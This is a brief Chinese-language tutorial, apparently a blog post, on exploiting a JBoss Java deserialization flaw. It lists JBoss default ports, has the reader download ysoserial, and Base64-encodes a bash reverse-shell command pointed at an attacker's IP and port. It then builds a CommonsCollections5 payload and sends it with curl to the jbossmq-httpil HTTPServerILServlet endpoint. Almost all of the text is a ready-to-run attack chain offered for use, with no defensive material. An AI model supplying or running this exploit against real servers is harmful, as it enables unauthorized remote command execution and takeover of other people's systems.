116180632957616152
前言
利用frohoff/ysoserial实现JBoss反序列化漏洞利用
默认端口1098,1099,4444,4445,8080,8009,8083,8093
下载项目
1
| wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar
|
攻击者监听反弹Shell
将反弹Shell的命令进行Base64编码
1
| echo -n "bash -i >& /dev/tcp/<ip>/<port> 0>&1" | base64
|
exp
<base64>:上一步骤Base64编码后的反弹Shell命令
1
| java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,<base64>}|{base64,-d}|{bash,-i}" > exp.ser
|
触发
1
| curl http://<ip>:<port>/jbossmq-httpil/HTTPServerILServlet --data-binary @exp.ser
|
完成